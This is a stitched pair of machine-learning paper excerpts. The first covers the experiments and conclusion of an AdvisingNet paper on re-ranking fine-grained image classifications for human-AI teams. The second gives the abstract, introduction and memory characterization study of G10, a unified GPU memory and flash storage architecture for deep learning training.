for the input image (L9-20). By focusing on the top-\(Q\) classes as predicted by \(\mathbf{C}\), this strategy mitigates issues associated with the long-tail distribution often encountered in classification problems (i.e., reducing the influence of less likely "tail" classes). Additionally, this approach provides an added degree of interpretability since the decision-making process is based on pairwise image comparisons, allowing for an intuitive understanding of the class assignments (see Fig. 3 and Sec. A13). A minimal sketch of this re-ranking loop is given at the end of this section. Figure 2: (a) Our sampling method generates positive and negative pairs based on top-predicted labels on \(x\) from a pre-trained, frozen classifier \(\mathbf{C}\). In this example, the ground-truth label of \(x\) is Painted Bunting, which matches the top-1 class, yielding \(K\) positive pairs. In contrast, \(Q-1\) classes do not match the ground-truth label and each provides a negative pair. Ultimately, this forms a collective \(Q+K-1\) pairs per sample \(x\) for the training of AdvisingNets. (b) The AdvisingNet architecture consists of both convolutional and Transformer layers. The network processes a pair of images \((x,x_{nn})\) as input and produces a score \(\mathbf{s}\in\mathbb{R}\). This score is subsequently passed through a sigmoid layer \(\sigma\) to determine if the images are of the same class. \(L\), \(M\), and \(N\) are the depths of the corresponding blocks. ## 3 Experimental setups ### Datasets We evaluate AdvisingNets on two datasets that have been widely utilized for benchmarking prototype-based classifiers [1, 13, 14] and explanation methods [15, 16]: 1. **CUB-200-2011** (hereafter, CUB-200) is a collection of 11,788 images (5,994 for training and 5,794 for test) across 200 bird species; 2. **Stanford Cars** (hereafter, Cars-196) is a car dataset that includes 16,185 images (8,144 for training and 8,041 for test) spanning 196 distinct classes. ### Pretrained classifiers **C** For CUB-200, we use a ResNet-50 model pretrained on the iNaturalist dataset and finetuned on CUB-200 (85.83% top-1 accuracy) from [11]. For Cars-196, we choose three ResNet models [1] (i.e., ResNet-18: 86.17%, ResNet-34: 82.99%, and ResNet-50: 89.73%), all pretrained on ImageNet and finetuned on Cars-196. ### Training parameters We use Stochastic Gradient Descent (SGD) to train AdvisingNets, where convolutional layers are trainable (see Sec. A3), and adopt OneCycleLR [14] for learning rate scheduling. Additionally, TrivialAugment [15] is applied to image pairs during training. This augmentation technique plays a crucial role in training AdvisingNets as it reduces overfitting (see Sec. A10). For CUB-200, we train AdvisingNets over 100 epochs with a batch size of 256 and a learning rate of \(0.001\). The model architecture for this dataset is defined by \(M=N=4\) and \(L=2\). For Cars-196, we use the same batch size and number of epochs, but adjust the initial learning rate to \(0.01\). The architecture of the model employed for this dataset is specified by \(M=N=3\) and \(L=3\). Unless specified differently, both the self and cross-attention Transformer blocks utilize 8 heads, and for the sampling process, \(Q=K=10\). More training details are in Sec. A1. 
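Returning to the TCR procedure of Sec. 2.2, the following is a minimal sketch of the re-ranking loop referenced above; `classifier`, `advising_net`, and `class_representative` are hypothetical stand-ins for the pretrained model \(\mathbf{C}\), the trained AdvisingNet, and a per-class closest-NN lookup.

```python
import torch

@torch.no_grad()
def tcr_predict(x, classifier, advising_net, class_representative, Q=10):
    """Top-classes Reranking sketch: re-rank C's top-Q classes by the
    AdvisingNet's pairwise confidence and return the winning class."""
    probs = classifier(x).softmax(dim=-1)              # initial predictions P
    top_q = probs.topk(Q, dim=-1).indices.squeeze(0)   # top-Q class indices
    best_cls, best_conf = None, -1.0
    for cls in top_q.tolist():
        x_nn = class_representative(x, cls)            # closest NN of x in class cls
        conf = torch.sigmoid(advising_net(x, x_nn)).item()
        if conf > best_conf:
            best_cls, best_conf = cls, conf
    return best_cls, best_conf
```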
### Human-AI team set-ups We consider multiple decision-making setups which range from human or AI model only to human-AI teams for the task of predicting whether **C** is correct or wrong: _Human only_: In this setting, humans are assigned all instances to make decisions and are provided with kNN explanations (because AdvisingNets also leverage NNs). _AI auto-accept_: This setting involves only the AI agent **C** and the top-1 predicted label of **C** will be automatically accepted. _AI Thresholding_: Instead of automatically accepting all predictions, this setting identifies the optimal threshold on the confidence score of **C** on a validation set. In test, this threshold is used to determine whether to accept or reject decisions. _Human-Thresholding_: This setup delegates uncertain predictions of **C** to humans and auto-accepts the remaining. _Human-AdvisingNet_: In this setup, we replace the AI Thresholding agent with AdvisingNet. We train an AdvisingNet to align with the human-AI setup in [11, 14] where they split the 5,794 test samples into two groups, 1,000 for validation and 4,794 for test. The validation set is used to tune the performance of both human and AI before they work complementarily on the test examples. ### Baselines for image classification We present the baseline classifiers that we use in comparisons with AdvisingNets (+ Top-classes Reranking) for multi-class image classification tasks.1 Please see Sec. A2 for further details and the rationale behind choosing these baseline classifiers. Footnote 1: Note that all baselines follow the same training procedures (i.e., train/test samples are 5,994/5,794 for CUB-200 and 8,144/8,041 for Cars-196). _Parametric classifiers_ (Deep CNNs): We compare against ResNet classifiers that have been trained to classify 200 Bird and 196 Car categories. _Non-parametric classifiers_ (kNN): kNN classifiers leverage comparisons with training prototypes to derive predicted labels. We consider kNN-RN50 and kNN-AdvNet, which uses embeddings from RN50 or AdvisingNets respectively, and select \(k=20\) as in [11]. _Prototypical part-based classifiers_: We are interested in the comparisons with ProtoPNet [31], ProtoToTree [25], ProtoPool [12], Deformable ProtoPNet [13], and ProtoKNN [25]. _Correspondence-based classifiers_: For CUB-200, we compare against EMD-Corr and CHM-Corr [11], the two visual correspondence-based classifiers that also perform re-ranking. ## 4 Experimental results We evaluate AdvisingNets on two important downstream scenarios: substituting AdvisingNet in human-AI teams and using AdvisingNet (+ TCR) to improve classifier \(\mathbf{C}\) in image classification. ### AdvisingNets improve human-AI team accuracy in Accepting/Rejecting AI decisions Due to the absence of human data for Cars-196, we focus our investigation of human-AI teaming on CUB-200. As demonstrated in Table 1, AdvisingNets significantly outperforms prior baselines. When benchmarked against humans provided with nearest-neighbor explanations, AdvisingNet achieves a substantial increase in accuracy of +25.88 pts. Moreover, compared to an AI auto-accept agent, AdvisingNet improves classification performance by a margin of \(+4.80\) pts. In the case of AI Thresholding, AdvisingNet continues to show superior performance by beating it by +3.23 pts. Against a human + AI Thresholding team, AdvisingNet showcases its strength by enhancing the classification performance by +3.97 pts. 
Interestingly, we observe little improvement when comparing Human-AdvisingNet to the AdvisingNet alone. Since humans often struggle with fine-grained classification tasks [30, 31], integrating humans into the team does not necessarily improve performance. Thus, in scenarios where a highly capable AI agent like the AdvisingNet is involved, human intervention may not be required in the final decision-making step. Instead, the strength of advanced AI agents might be sufficient to drive accurate outcomes. ### AdvisingNets improve classifiers' accuracy **CUB-200 image classification** In Table 2, AdvisingNet (+ TCR) stands out with a top-1 classification accuracy of 88.00%, directly improving RN50 by +2.17 2 pts. Its performance also beats the results achieved by all of non-parametric, prototypical part-based, and correspondence-based classifiers on the challenging CUB-200 test set. Footnote 2: +Green texts denotes direct improvements over the pretrained model \(\mathbf{C}\). Compared to a non-parametric classifier (kNN-RN50) that achieves an accuracy of 85.46%, AdvisingNet demonstrates a clear advantage in classification accuracy. The poor performance of kNN-AdvNet is because the discriminative power has been shifted to the Transformer layers. This transition causes the kNN algorithm, working on the convolutional features, to significantly reduce the accuracy compared to using the original features of RN50, from 85.46% to 31.01%. Among the prototypical part-based classifiers, namely ProtoPNet, ProtoTree, ProtoPool, Def-ProtoPNet, and ProtoKNN, AdvisingNet maintains its lead with margins ranging from 1.00 to 6.90 pts. Additionally, when compared to the correspondence-based classifiers, EMD-Corr (84.98%) and CHM-Corr (83.27%), AdvisingNet's performance remains superior. The improvement of the CUB-200 RN50 classifier, as presented in Table 2, can be attributed to the power of the re-ranking algorithm (TCR). We illustrate this re-ranking in Fig. 3. For example, RN50 initially incorrectly classified the \begin{table} \begin{tabular}{|l|c|} \hline **Classifier** & **Acc (\%)** \\ \hline Human only \({}^{\dagger}\) & 64.75 \\ \hline AI auto-accept & 85.83 \\ \hline AI Thresholding \({}^{\dagger}\) & 87.40 \\ \hline Human-Thresholding \({}^{\dagger}\) & 86.66 \\ \hline AdvisingNet & 90.63 \\ \hline Human-AdvisingNet & 90.65 \\ \hline \end{tabular} \end{table} Table 1: Binary (accept/reject) classification accuracy of various human-AI team setups on 4,794 CUB-200 test samples. \({}^{\dagger}\)[11]. \begin{table} \begin{tabular}{|l|l|c|} \hline **Model type** & **Classifier** & **Top-1 Acc (\%)** \\ \hline Parametric & RN50\({}^{\dagger}\) & 85.83 \\ \hline \multirow{2}{*}{Non-parametric} & kNN–RN50\({}^{\dagger}\) & 85.46 \\ & kNN–AdvNet & 31.01 \\ \hline \multirow{4}{*}{Prototypical part-based} & ProtoPNet\({}^{\spadesuit}\) & 81.10 \\ & ProtoTree\({}^{\spadesuit}\) & 82.20 \\ \cline{1-1} & ProtoPool\({}^{\spadesuit}\) & 85.50 \\ \cline{1-1} & Def-ProtoPNet\({}^{\spadesuit}\) & 86.40 \\ \cline{1-1} & ProtoKNN\({}^{\spadesuit}\) & 87.00 \\ \hline \multirow{2}{*}{Correspondence-based} & EMD-Corr\({}^{\dagger}\) & 84.98 \\ \cline{1-1} & CHM-Corr\({}^{\dagger}\) & 83.27 \\ \hline AdvisingNet & TCR (Ours) & **88.00 \(\pm\) 0.11** \\ \hline \end{tabular} \end{table} Table 2: Top-1 classification accuracy of AdvisingNet and baselines on CUB-200 test set (5794 samples). We compute AdvisingNet accuracy over \(3\) random seeds (see Sec. A8). 
\({}^{\dagger}\)[11], ProtoPool (Rymarczyk et al., 2022), \({}^{\spadesuit}\)[11], using full, uncropped images w/o model ensemble. \({}^{\clubsuit}\)[11], \({}^{\clubsuit}\)[11], using \(k=1\) like AdvisingNets and margin. All models have ResNet-50 backbone that was pretrained on i-Naturalist 2017 [12]. query of **Green Jay** as **Indigo Bunting**. However, upon reviewing the top-predicted classes, The AdvisingNet determines that RN-50's second-highest predicted label is a better fit for the query image, subsequently identifying **Green Jay** as the correct classification for the query. We provide a more comprehensive set of examples in Sec. A13. Cars-196 image classificationIn Table 3, we present an analysis of top-1 classification accuracy on the **Cars-196** test set. Our proposed approach, AdvisingNet (+ TCR), outperforms both the non-parametric classifier (kNN-RN50) and the parametric classifier (RN50) by +2.89 pts and +0.64 pts, respectively. We also notice a similar drop in classification accuracy when utilizing retrained convolutional features (kNN-AdvNet), as seen in CUB-200. Among the prototypical part-based classifiers, ProtoPool achieves 88.90%, ProtoTree achieves 86.60%, and ProtoRNN achieves 90.20%. Notably, our proposed approach, AdvisingNet (Top-classes Reranking), excels with a remarkable top-1 classification accuracy of 90.37%. Both AdvisingNet and ProtoKNN stand out as top-performing models in this dataset. Model generalization tests for AdvisingNetsWhile we have shown that AdvisingNets (+ TCR) can improve the accuracy of pretrained models seen in training, we also wish to study their generalizability to pretrained models not seen during training (unseen models). To answer this question, we use an AdvisingNet trained on ResNet-50 (85.83% top-1 accuracy) to refine the predictions of NTS-Net [20] (87.43% top-1 accuracy) for CUB-200. For the Cars-196 dataset, we choose an AdvisingNet trained on ResNet-18 (86.17% top-1 accuracy) to improve the performance of MobileNet-V2 (87.49% top-1 accuracy). As summarized in Table 4, we find that AdvisingNets clearly improve the performance of unseen classifiers. The NTS-Net model, when tested on CUB-200, has been improved by +1.01 pts. Similarly, the MobileNet-V2 model on Cars-196 benefits from a +0.40 pts increase in accuracy. This is intriguing because AdvisingNets have never seen the distributions of top-predicted classes and the retrieved NNs from such out-of-training classifiers. Additionally, we test whether AdvisingNets can boost the accuracy of pretrained classifiers beyond RN50 by training two AdvisingNets using RN34 and RN18 for Cars-196, with results detailed in Sec. A6 and A9. Interestingly, we also achieve improvements of +1.15 pts for RN34 and +0.83 pts for RN18 in Cars classification. Hyperparameter tests for AdvisingNetsAs mentioned in Sec. 2.1, AdvisingNets learn to compare the input query with a _single_ nearest neighbor. We expand this by averaging results from 3 or 5 pairwise comparisons in test. We find that using more NNs for comparisons marginally enhances the performance but also incurs higher computational cost (see Sec. A7 for details). Finally, our experiments opt for empirical settings with \(Q=K=10\). We delve into different values of \(Q\) and \(K\) in Sec. A11. Although smaller values considerably diminish AdvisingNet's performance, we observe a slight improvement in accuracy when increasing these values from 10 to 15. 
## 5 Related Works Learning from nearest-neighbor-based positive and negative pairs.Contrastive learning is a self-supervised learning technique that aims to maximize the agreement between positive pairs and minimize it between negative pairs to learn more meaningful representations. Nearest neighbors have emerged as a key component in the sample selection step of contrastive learning pipelines [14, 15, 16, 17]. While training Advisingnets also utilizes positive and negative instances as in contrastive learning approaches, our training pipeline differs in that we leverage the top-predicted labels of a pretrained model to determine the classes for sampling. Moreover, while existing works typically optimize for contrastive loss functions like InfoNCE [16], we directly train a binary classification model using cross entropy loss, which simplifies the training process. Effective AI agents for human-AI teaming.One of the applications studied in this work is human-AI teaming, which refers to setups where humans and AI agents work together to make better and more responsible decisions than either could achieve solo. In many setups, AI agents support humans who are the final decision-makers [18] or they might simply rely on model uncertainty [19] in decision-making, leading to reduced human-AI performance and potential fragility in OOD environments where models exhibit high confidence but make erroneous predictions [20]. \begin{table} \begin{tabular}{|l|c|c|c|} \hline **Dataset** & **Seen classifier** & \multicolumn{2}{c|}{**Unseen classifier**} \\ \hline \multirow{2}{*}{CUB-200} & **RN50** & **NTS-Net** & **Improved** \\ \cline{2-4} & 85.83 & 87.43 & 88.44 (+1.01) \\ \hline \multirow{2}{*}{Cars-196} & **RN18** & **MobileNet-V2** & **Improved** \\ \cline{2-4} & 86.17 & 87.49 & 87.89 (+0.40) \\ \hline \end{tabular} \end{table} Table 4: Top-1 classification accuracy (%) of unseen classifiers before and after working with AdvisingNets. \begin{table} \begin{tabular}{|l|l|c|} \hline **Model type** & **Classifier** & **Top-1 Acc (\%)** \\ \hline Parametric & RN50\({}^{\dagger}\) & 89.73 \\ \hline \multirow{2}{*}{Non-parametric} & kNN-RN50\({}^{\dagger}\) & 87.48 \\ & kNN-AdvNet & 16.90 \\ \hline \multirow{3}{*}{Prototypical part-based} & ProtoTree\({}^{\clubsuit}\) & 86.60 \\ & ProtoPool\({}^{\clubsuit}\) & 88.90 \\ \cline{1-1} & ProtoKNN\({}^{\clubsuit}\) & 90.20 \\ \hline AdvisingNet & TCR (Ours) & 90.37 \(\pm\) 0.04 \\ \hline \end{tabular} \end{table} Table 3: Top-1 classification accuracy of AdvisingNet and baselines on Stanford Cars-196 test set (8041 samples). We compute AdvisingNet accuracy over \(3\) random seeds (see Sec. A8). \({}^{\dagger}\) [15]; and Clune 2015). In response to these challenges, we introduce AdvisingNet, an effective AI agent designed to make decisions by considering both the input image and external knowledge sources (i.e., training nearest neighbors). Ranking-based image classification.A second task studied in this work is the use of AdvisingNet to improve a pretrained image classifier. In general, image classification models are typically softmax-based classifiers, which rank all potential classes using logit scores and designate the highest-scoring class as the predicted label for a given image. In contrast, ProtoPNet (Chen et al. 2019), an interpretable model that classifies images by matching parts of the input image to patch prototypes found in the training set, determines the class rankings via the similarity between the input features and those of each class. 
This strategy is also found in k-nearest neighbors (kNN) algorithms, where the nearest neighbors are ranked based on the similarity to the input image (Papernot and McDaniel 2018). There have recently been proposals for re-ranking the neighbor candidates retrieved from kNN classifiers to refine the initial predictions using both image-level and patch-wise comparisons (Phan and Nguyen 2022; Taesiri, Nguyen, and Nguyen 2022). Rather than refining predictions by re-ranking nearest neighbors from kNN classifiers, we steer our attention towards optimizing the ranking of top-predicted classes resulting from a softmax classifier. Furthermore, while traditional kNN-based strategies and methods like ProtoPNet (Chen et al. 2019) require significant computational resources due to the need for pairwise distance calculations or examination of all classes, our proposed algorithm TCR alleviates this demand by focusing only on a few top-predicted classes, concentrating computational resources in the most promising regions of the classification space. Put simply, the ranking is based not on similarity scores but on the confidences of AdvisingNet for classes. ## 6 Conclusion We present AdvisingNet, a model that compares an input image against its nearest neighbors to effectively classify whether a pretrained model correctly classifies an input image. In general, we found that AdvisingNets significantly outperformed previous human, AI, and team baselines in the task of classifying correct and incorrect predictions. Additionally, while AdvisingNets were not explicitly trained for multi-class image classification tasks, we also observed that they consistently help achieve accuracy that either outperformed or was on par with, state-of-the-art methods on both the CUB-200 and Cars-196 datasets. The benefits of using AdvisingNets over traditional deep CNN classifiers indicate the benefits of leveraging external data, especially nearest neighbors, to help in fine-grained classification tasks. Future Work and Limitations.Our findings suggest that AdvisingNets are not limited to improving only ResNets, but extend to enhancing any classification models. In cases where it is not feasible to leverage convolutional features as image-representing patch tokens, we can patchify images and encode them in a similar fashion as Vision Transformers (ViT) (Dosovitskiy et al. 2020). Due to computational constraints, scaling AdvisingNets for large-scale classification datasets, such as ImageNet (Russakovsky et al. 2015), has not been explored in this work. We also anticipate a connection between the performance of AdvisingNets and that of the pretrained models, a relationship that has not been investigated yet. Figure 3: An example of how AdvisingNet corrects a previously incorrect prediction on CUB-200. A RN50 model makes predictions on the Query image (ground-truth label: **Green Jay**) and produces initial ranking (top row) but the top-1 predicted class (**Indigo Bunting**) is incorrect. The AdvisingNet compares the query image with the representative of each class (the first NN example in each class) to re-rank those classes based on its confidence scores. The refined class ranking is presented in the bottom row where the **Green Jay** class has been successfully recognized as top-1.
2310.09443
G10: Enabling An Efficient Unified GPU Memory and Storage Architecture with Smart Tensor Migrations
To break the GPU memory wall for scaling deep learning workloads, a variety of architecture and system techniques have been proposed recently. Their typical approaches include memory extension with flash memory and direct storage access. However, these techniques still suffer from suboptimal performance and introduce complexity to the GPU memory management, making them hard to meet the scalability requirement of deep learning workloads today. In this paper, we present a unified GPU memory and storage architecture named G10 driven by the fact that the tensor behaviors of deep learning workloads are highly predictable. G10 integrates the host memory, GPU memory, and flash memory into a unified memory space, to scale the GPU memory capacity while enabling transparent data migrations. Based on this unified GPU memory and storage architecture, G10 utilizes compiler techniques to characterize the tensor behaviors in deep learning workloads. Therefore, it can schedule data migrations in advance by considering the available bandwidth of flash memory and host memory. The cooperative mechanism between deep learning compilers and the unified memory architecture enables G10 to hide data transfer overheads in a transparent manner. We implement G10 based on an open-source GPU simulator. Our experiments demonstrate that G10 outperforms state-of-the-art GPU memory solutions by up to 1.75$\times$, without code modifications to deep learning workloads. With the smart data migration mechanism, G10 can reach 90.3\% of the performance of the ideal case assuming unlimited GPU memory.
Haoyang Zhang, Yirui Eric Zhou, Yuqi Xue, Yiqi Liu, Jian Huang
2023-10-13T23:32:28Z
http://arxiv.org/abs/2310.09443v1
# G10: Enabling An Efficient Unified GPU Memory and Storage Architecture with Smart Tensor Migrations ###### Abstract. To break the GPU memory wall for scaling deep learning workloads, a variety of architecture and system techniques have been proposed recently. Their typical approaches include memory extension with flash memory and direct storage access. However, these techniques still suffer from suboptimal performance and introduce complexity to the GPU memory management, making them hard to meet the scalability requirement of deep learning workloads today. In this paper, we present a unified GPU memory and storage architecture named G10 driven by the fact that the tensor behaviors of deep learning workloads are highly predictable. G10 integrates the host memory, GPU memory, and flash memory into a unified memory space, to scale the GPU memory capacity while enabling transparent data migrations. Based on this unified GPU memory and storage architecture, G10 utilizes compiler techniques to characterize the tensor behaviors in deep learning workloads. Therefore, it can schedule data migrations in advance by considering the available bandwidth of flash memory and host memory. The cooperative mechanism between deep learning compilers and the unified memory architecture enables G10 to hide data transfer overheads in a transparent manner. We implement G10 based on an open-source GPU simulator. Our experiments demonstrate that G10 outperforms state-of-the-art GPU memory solutions by up to 1.75\(\times\), without code modifications to deep learning workloads. With the smart data migration mechanism, G10 can reach 90.3% of the performance of the ideal case assuming unlimited GPU memory. Keywords: GPUDirect Storage, Unified Virtual Memory, GPU Memory, Solid State Drives, Deep Learning Compiler. † Co-primary authors.
Moreover, these approaches typically require developers to manually manage the data across the heterogeneous memories to exploit data locality (Han et al., 2017; Wang et al., 2018; Wang et al., 2019; Wang et al., 2019). This inevitably complicates the GPU memory management and hurts the development productivity. Ideally, we wish to transparently expand the GPU memory using low-cost flash memory, while achieving similar performance as that of the GPU with unlimited on-board DRAM. Our characterization study of diverse DNN models (see §3) shows that this is feasible. We disclose that (1) only a small portion (less than 10%) of tensors are active in each DNN training iteration, and (2) a majority of inactive tensors remain inactive for a long period of time (see Figure 3). This offers sufficient opportunities for us to move tensor data across heterogeneous memory devices. Therefore, if we can intelligently move inactive tensors from the fast GPU memory to the slow memories (i.e., host memory and flash memory), we can not only improve the utilization of the precious GPU memory but also hide the data access overheads of the slow memories. To achieve the aforementioned goals, we have to overcome three major challenges. First, to enable intelligent tensor migrations, we need to capture the memory demand and lifetime of different tensors in a deep learning model. The tensor-level semantic knowledge will serve as the guidance for scheduling tensor migrations. Second, as different tensors have different properties (i.e., tensor size and lifetime in Figure 4), we need to carefully decide which tensor should be migrated, where it should be migrated to, and when it should be migrated. Third, the tensor migrations should be transparent to applications, and the migration should be executed in an automated manner without requiring manual effort from developers. In this paper, we present G10, a unified GPU memory and storage architecture that enables smart tensor migrations for scaling the GPU memory transparently using flash memory, while tolerating the performance overheads of slow flash accesses. 
G10 consists of three major components: (1) a tensor vitality analyzer for extracting the semantic knowledge of tensors in a deep learning model, (2) a tensor migration scheduler for planning the tensor migrations in advance, and (3) a unified memory system for simplifying the GPU memory management and enabling transparent tensor migrations. The tensor vitality analyzer works with deep learning frameworks like PyTorch to track all the tensors in a DNN model. It leverages the execution graph generated by the compiler to learn the size and lifetime of each tensor as well as its dependency on other tensors. Therefore, the analysis procedure is almost free at the compilation stage. Based on the extracted semantic knowledge of tensors, the tensor migration scheduler of G10 will plan the tensor migrations in advance before executing the model training process. To maximize the benefits of tensor migrations, G10 prefers to migrate large tensors that will be inactive for a long time to the flash memory. Therefore, the precious GPU memory can be best utilized for active tensors. G10 will migrate these inactive tensors as many as possible to fully utilize the available bandwidths of flash memory and host memory. For the inactive tensors whose inactive time is short, G10 will make the best effort to keep them in the GPU memory to avoid unnecessary tensor migrations. In order to tolerate the long access delay of flash memory and host memory, G10 also plans intelligent data prefetching in advance with its tensor migration scheduler. The detailed algorithms of the tensor migration scheduler will be discussed in SS4. To facilitate the tensor migration, G10 integrates the GPU memory, host memory, and flash memory as a unified memory space by extending the Unified Virtual Memory (UVM) (Chen et al., 2017) of GPUs. G10 extends the page table of UVM by storing flash page addresses in its leaf-level page table entries. The unified page table can point to an address in either host memory, GPU memory, or flash memory. As G10 plans tensor migrations, it only needs to specify the virtual addresses of tensors. The unified memory system will conduct the transparent address translation at runtime. This significantly simplifies the GPU memory management and the compiler optimizations. We implement G10 by extending an open-source GPU simulator UVMSmart (Chen et al., 2017). To evaluate G10, we run a variety of DNN models with different batch sizes. Compared to state-of-the-art solutions, G10 improves the end-to-end DNN training performance by up to 1.75\(\times\), while scaling the GPU memory with low-cost flash memory. With smart tensor migrations planned at the compilation stage, G10 delivers 90.3% of the performance of the ideal case assuming unlimited GPU memory. Our sensitivity analysis shows that G10 still has significant benefits, as we scale the GPU-SSD PCIe bandwidth. Overall, we make the following contributions: * We conduct a characterization study of the memory usage of diverse DNN training workloads, and show that the predictable tensor behaviors of DNN models provide sufficient opportunities for enabling smart tensor migrations. * We develop a unified GPU memory and storage architecture named G10, and show the feasibility of scaling GPU memory with flash memory, while achieving similar performance as the ideal case assuming unlimited GPU memory. 
* We propose a smart tensor migration mechanism that can intelligently plan tensor migrations across heterogeneous memories at the compilation stage, based on the extracted semantic knowledge of tensors. * We evaluate G10 against state-of-the-art GPU memory solutions and show its benefits for various DNN models. ## 2. Background and Motivation In this section, we first present modern GPU memory and storage architecture. After that, we discuss existing approaches to scaling GPU memory, and their limitations. ### GPU Memory and Storage Architecture We demonstrate the system architecture of modern GPU memory and storage in Figure 1 (Figure 1: Modern GPU memory/storage architecture). The GPU and storage devices like SSDs are connected with the host machine through the Peripheral Component Interconnect Express (PCIe) (Bartos et al., 2016). While the GPU has its own on-board memory, its capacity is constrained by the DRAM scaling wall and the limited on-board space for memory packages (Krishnan et al., 2017). Therefore, GPU memory cannot host the entire working set of large-scale deep learning workloads. To address this problem, GPUs follow the same way of managing memory/storage devices as in CPU-centric computing, and use the storage device as a swapping disk. If a page requested by the GPU is not in its memory, a page fault happens, and the GPU informs the host to handle the page fault, load the page from the storage device, and move it to the GPU memory, causing significant data movement overhead. ### Approaches to Scaling GPU Memory **Expand GPU memory with host memory.** Compared to the GPU memory, the host machine is usually equipped with a larger memory (albeit with limited bandwidth), making it a natural option for expanding GPU memory. While developers can manually swap the data between the host and GPU, modern GPUs make this procedure transparent with unified virtual memory (UVM) (Shi et al., 2017; Wang et al., 2018). UVM enables a unified and coherent virtual memory space between the host and GPU, so application data can be allocated in this space and accessed by host and GPU with shared virtual addresses. With the cooperation of GPU hardware and runtime, UVM maintains data consistency transparently and enables on-demand data migrations between the host and GPU at page granularity. Upon accessing a UVM page absent in the GPU memory, a GPU page fault will be triggered to request a data migration from the host (Krishnan et al., 2017; Wang et al., 2018). When the GPU memory is fully occupied, the least recently used pages are evicted from the GPU memory to the host memory. To improve the swapping efficiency, prior studies (Krishnan et al., 2017; Wang et al., 2018; Wang et al., 2018; Wang et al., 2018; Wang et al., 2018; Wang et al., 2018; Wang et al., 2018) developed optimization techniques for improved data locality. However, GPU memory still cannot scale by relying purely on the host memory to meet the increasing demands of deep learning workloads, especially large ones. **Expand GPU memory with flash memory.** An alternative approach is to expand GPU memory with SSDs, as shown in Figure 1. The rapidly shrinking process technology has allowed SSDs to boost their bandwidth and capacity by increasing the number of chips. However, the GPU has to communicate with the host CPU to access data on the SSD, which incurs significant performance overhead (Wang et al., 2018; Wang et al., 2018; Wang et al., 2018). 
Most recently, NVIDIA's GPUDirect Storage allows GPU to bypass the host CPU and directly access the SSD via the PCIe interface (Wang et al., 2018). AMD's DirectGMA (Krishnan et al., 2017) also enables a similar functionality. However, current approaches of using flash memory to expand GPU memory are still suffering from suboptimal performance, as they cannot efficiently hide the slow flash accesses. A recent study proposed to offload intermediate data of DNN models to the SSD (Krishnan et al., 2017), and overlap the GPU processing with flash data accesses. However, due to the lack of rich semantic knowledge of tensors, there is still much space for improvement. In this paper, we conduct a characterization study of the semantic knowledge of tensors, and demonstrate the unexplored opportunities in SS3. ## 3. GPU Memory Characterizations In this section, we first study the memory usage patterns of DNN training for representative real-world large models listed in Table 1. We analyze the DNN dataflow graph to extract useful DNN semantics and profile the execution of each CUDA kernel on an NVIDIA A100 GPU. For ease of discussion, we define that a tensor is _active_ at a certain time if it is used by the currently executing kernel, or _inactive_ otherwise. We summarize our findings as follows. **Small memory requirement of active tensors.** We first study the total memory demand of a single training iteration. Figure 2 shows the amount of GPU memory required by active tensors and the total memory required during a training iteration. For most DNN models, active tensors only account for less than 10% (1% on average) of the total memory requirement. While the memory capacity required by the entire DNN can greatly exceed GPU memory, each layer only accounts for a small portion. For example, the largest kernel in our studied models occupies 5.7GB of memory, much smaller than the 40GB available memory of A100. This gives abundant opportunities to leverage the unused memory for preparing the tensors required by the next kernel, enabling efficient overlapping of GPU compute and memory swapping. **Observation (O1):** During DNN training, only a small portion of tensors are active and required in GPU DRAM. Most tensors are inactive and can be swapped out. Figure 2. Memory consumption of all and active tensors (w.r.t. peak memory consumption in a single training iteration). CUDA kernel indexes are in execution order. Long unused time of inactive tensors.To understand the memory usage pattern of inactive tensors, we study how long a tensor remains inactive. We define an _inactive period_ as a time interval during which the tensor remains inactive until it is used by another kernel. Figure 3 shows the distribution of lengths of the inactive periods for all tensors. For CNN models (ResNet152 and Inceptionv3), more than 60% of the inactive periods last longer than \(10^{7}\upmu\)s. For Transformer models (BERT and ViT), about 50% of the inactive periods last longer than \(10^{5}\upmu\)s. This indicates that many tensors have inactive periods longer than the SSD latency (e.g., \(20\upmu\)s), which provides opportunities for us to swap out these tensors to external SSD devices with negligible performance penalties. The long unused time of inactive tensors is the result of the temporally sparse tensor access pattern during DNN training. 
In a typical DNN dataflow graph, one tensor only needs to be used twice, once in the forward pass and once in the backward pass, unless the tensor is involved in a branch or join layer. Although the dataflow graphs of some DNN models may have a complex topology consisting of multiple branches, joins, and unrolled loops, the overall dataflow still tends to be linear, so each tensor is only used a few times. **Observation (O2):** During DNN training, many tensors stay inactive for long time periods. They can be safely swapped out before being needed again by any kernel. **Diversity of inactive tensors.** Figure 4 shows that the inactive periods of tensors have diverse lengths (e.g., ranging from \(\sim\)10\(\mu\)s to 100\(\mu\)s in Inceptionv3-512). The inactive tensors also have vastly different sizes (e.g., from less than 10KB to more than 2.7GB in Inceptionv3-512), and their distribution is quite sparse. In fact, over 60% to 80% of inactive periods are able to hide the swapping latency, indicating that we have sufficient opportunities to swap tensors. When we decide to swap out a tensor, we can reduce the GPU memory consumption during the tensor's inactive period. The diversity of inactive tensors introduces challenges to the swapping algorithm design, as different swapping decisions can have different benefits and I/O costs. To maximize the efficiency of memory swapping, it is important to choose those tensors that can reduce the memory usage by the largest amount, for the longest time, and with the lowest I/O cost. **Observation (O3):** Different swapping decisions impact GPU memory consumption differently in both time and space, given the different sizes and inactive period lengths of tensors. To maximize memory efficiency, we should swap out the most beneficial tensors. **Complexity of scheduling tensor swapping.** In Figure 2, we observe that the memory consumption of a DNN program is not uniform throughout its entire execution. As we make tensor swapping decisions, the GPU memory consumption pattern also changes as tensors are swapped in or out at runtime. Moreover, each swap occupies bandwidth on the GPU-Host and GPU-SSD links. Consequently, the above complexities render a static policy ineffective for deciding which tensor should be evicted and when this eviction should occur. **Observation (O4):** The GPU memory consumption changes throughout the DNN training process and is affected dynamically by tensor swapping decisions. Hence, a static tensor swapping policy is insufficient for finding a globally optimized swapping plan. ## 4. G10 Design ### System Overview We show the G10 architecture in Figure 5. It has three major components: (1) a tensor vitality analyzer that quantifies the tensor size and liveness as we compile a DNN model (§4.2); (2) a tensor migration scheduler for planning the tensor migrations in advance (§4.3 and §4.4); and (3) a unified memory system for simplifying GPU memory management and enabling transparent tensor migrations (§4.5 and §4.6). Figure 4. The distribution of inactive periods of tensors having different sizes. Figure 3. Distribution of tensor inactive period lengths. Given a DNN model, G10's tensor vitality analyzer will work with DNN compilers to track all the tensors and their dependencies, and quantify their sizes and lifetime (i.e., semantic knowledge of tensors). 
